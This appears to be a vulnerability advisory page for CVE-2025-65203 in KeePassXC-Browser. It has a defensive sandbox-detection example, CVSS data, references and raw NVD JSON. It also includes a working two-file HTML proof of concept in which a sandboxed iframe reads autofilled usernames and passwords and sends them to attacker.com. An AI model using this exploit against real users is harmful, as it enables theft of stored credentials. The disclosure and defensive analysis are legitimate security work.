Security Vulnerability Report
CVE-2025-65203 CVSS 7.1 HIGH

Published: 2025-12-17 18:15:49
Last Modified: 2026-01-05 14:45:42

Description

KeePassXC-Browser through 1.9.9.2 autofills, or prompts to fill, stored credentials into documents that the browser renders under a sandbox (the CSP sandbox directive or the iframe sandbox attribute). A document sandboxed without allow-same-origin has an opaque origin, so any script it runs is attacker-controlled relative to the site whose credentials are filled; that script can read the populated form fields and exfiltrate the credentials.
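The check that matters here, as an added example and not code from the KeePassXC-Browser project: given a document's Content-Security-Policy header and the sandbox attribute of the iframe that embeds it (both modelled as plain fields of a constructed object), decide whether the rendered document has an opaque origin, and refuse to fill in that case. The PoC's sandbox="allow-scripts allow-forms" is one of the constructed inputs; the function and field names are this example's own.

```javascript
// Added example (not KeePassXC-Browser's own code): decide whether a document
// is rendered with an opaque ("null") origin because of sandboxing, which is
// the condition under which an autofilling extension must refuse to fill.

// Parse a Content-Security-Policy header value into a Map of lowercase
// directive name -> array of tokens. Per the CSP spec, a directive that
// appears more than once is taken from its first occurrence only.
function parseCsp(header) {
  const directives = new Map();
  for (const part of String(header || "").split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

// Sandbox keywords (iframe attribute or CSP sandbox directive) are
// ASCII case-insensitive, so compare them lowercased.
function keywordSet(value) {
  return new Set(
    String(value).trim().split(/\s+/).filter(Boolean).map((t) => t.toLowerCase())
  );
}

// A sandbox flag set that lacks allow-same-origin forces an opaque origin.
// Returns a reason string, or null when the document keeps its real origin.
//   doc.cspHeader:   the HTTP Content-Security-Policy header. A <meta> CSP
//                    cannot carry the sandbox directive, so only the header
//                    is consulted (assumed model input).
//   doc.sandboxAttr: the embedding iframe's sandbox attribute, or null when
//                    the attribute is absent. An empty string means the
//                    attribute is present with every restriction applied.
function sandboxOpaqueReason(doc) {
  const csp = parseCsp(doc.cspHeader);
  if (csp.has("sandbox") && !keywordSet(csp.get("sandbox").join(" ")).has("allow-same-origin")) {
    return "CSP sandbox directive without allow-same-origin";
  }
  if (doc.sandboxAttr !== null && doc.sandboxAttr !== undefined) {
    if (!keywordSet(doc.sandboxAttr).has("allow-same-origin")) {
      return "iframe sandbox attribute without allow-same-origin";
    }
  }
  return null;
}

// Runtime check a content script can make without seeing any headers: in a
// sandboxed document without allow-same-origin, self.origin and
// location.origin are the literal string "null".
function originIsOpaque(origin) {
  return origin === "null";
}

// Combined decision: fill only when neither the runtime origin nor the
// sandbox configuration indicates an opaque origin.
function shouldFillCredentials(doc, runtimeOrigin) {
  return !originIsOpaque(runtimeOrigin) && sandboxOpaqueReason(doc) === null;
}

// Constructed inputs: the PoC's frame and an ordinary, unsandboxed login page.
const pocFrame = { cspHeader: "", sandboxAttr: "allow-scripts allow-forms" };
const normalPage = { cspHeader: "default-src 'self'", sandboxAttr: null };

console.log("PoC frame:", sandboxOpaqueReason(pocFrame),
            "fill:", shouldFillCredentials(pocFrame, "null"));
console.log("normal page:", sandboxOpaqueReason(normalPage),
            "fill:", shouldFillCredentials(normalPage, "https://example.com"));
```

The header-based path is what a reviewer or a proxy can evaluate offline; the self.origin check is the one a content script can actually perform at fill time, and it covers both the CSP directive and the attribute because the browser has already applied them to the document's origin.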

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:keepassxc:keepassxc-browser:*:*:*:*:*:*:*:* - VULNERABLE
KeePassXC-Browser <= 1.9.9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-65203 PoC: KeePassXC-Browser credential theft via sandboxed iframe -->
<!-- File 1: attacker-controlled top-level page -->
<!DOCTYPE html>
<html>
<head>
  <title>KeePassXC-Browser CSP Bypass PoC</title>
  <meta http-equiv="Content-Security-Policy" content="frame-src 'self' https://attacker.com; script-src 'unsafe-inline'">
</head>
<body>
  <h1>Legitimate Login Page (Attacker Controlled)</h1>
  <form action="https://attacker.com/steal">
    <input type="text" name="username" id="user">
    <input type="password" name="password" id="pass">
    <button type="submit">Login</button>
  </form>

  <!-- Attacker-controlled sandboxed iframe holding the fake login form.
       The sandbox lacks allow-same-origin, so the frame has an opaque origin;
       the vulnerable extension fills it anyway. -->
  <iframe id="sandboxFrame" src="sandbox.html" sandbox="allow-scripts allow-forms"></iframe>

  <script>
    // Listen for credentials posted by the sandboxed iframe
    window.addEventListener('message', function (event) {
      if (event.data && event.data.type === 'stolen_creds') {
        console.log('Stolen credentials:', event.data.credentials);
        // Send to attacker server (URL-encoded so the JSON survives as a query value)
        fetch('https://attacker.com/log?creds=' +
              encodeURIComponent(JSON.stringify(event.data.credentials)));
      }
    });
  </script>
</body>
</html>

<!-- File 2: sandbox.html (hosted on attacker.com) -->
<!DOCTYPE html>
<html>
<head>
  <title>Embedded Form</title>
</head>
<body>
  <form id="fakeLogin">
    <input type="text" name="username" id="user">
    <input type="password" name="password" id="pass">
    <button type="submit">Submit</button>
  </form>
  <script>
    // Wait for KeePassXC-Browser to autofill the fields, then read them
    setTimeout(() => {
      const user = document.getElementById('user').value;
      const pass = document.getElementById('pass').value;
      if (user && pass) {
        // Exfiltrate credentials to the parent page via postMessage
        window.parent.postMessage({
          type: 'stolen_creds',
          credentials: { username: user, password: pass }
        }, '*');
      }
    }, 3000);
  </script>
</body>
</html>

References

https://github.com/keepassxreboot/keepassxc-browser/issues/2647 (Third Party Advisory, Issue Tracking)
https://github.com/keepassxreboot/keepassxc-browser/pull/2648 (Patch, Third Party Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-65203",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-17T18:15:48.860",
    "lastModified": "2026-01-05T14:45:41.533",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "KeePassXC-Browser thru 1.9.9.2 autofills or prompts to fill stored credentials into documents rendered under a browser-enforced CSP directive and iframe attribute sandbox, allowing attacker-controlled script in the sandboxed document to access populated form fields and exfiltrate credentials."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-352"},
          {"lang": "en", "value": "CWE-353"},
          {"lang": "en", "value": "CWE-640"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:keepassxc:keepassxc-browser:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "1.9.9.2",
                "matchCriteriaId": "BFE9A6CC-9DA6-4C10-8C1C-42B97F643826"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/keepassxreboot/keepassxc-browser/issues/2647",
        "source": "[email protected]",
        "tags": ["Third Party Advisory", "Issue Tracking"]
      },
      {
        "url": "https://github.com/keepassxreboot/keepassxc-browser/pull/2648",
        "source": "[email protected]",
        "tags": ["Patch", "Third Party Advisory"]
      }
    ]
  }
}